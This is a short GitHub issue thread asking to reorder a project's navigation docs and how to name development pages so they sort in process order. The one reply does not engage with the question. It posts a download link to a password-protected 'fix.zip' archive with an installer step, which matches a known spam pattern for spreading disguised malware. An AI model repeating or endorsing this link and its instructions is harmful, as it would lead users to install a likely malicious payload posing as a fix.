### ISSUE TITLE
New nav order in docs

### ISSUE THREAD

**Issue by KateMacdonald** [WestpacGEL/GEL-next#850]
Can we please update the navigation docs to reflect the image below.

PS -  I just realised that I re-named the pages sitting under development because I thought active labels made more sense, but maybe they were named originally to make sure they appeared in a particular order (alphabetically). What order makes the most sense for devs? How would you name them so they appear alphabetically as well as in the appropriate order for the process?
![image](https://github.com/user-attachments/assets/18d290e3-7621-4e1d-9588-0d8699144733)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
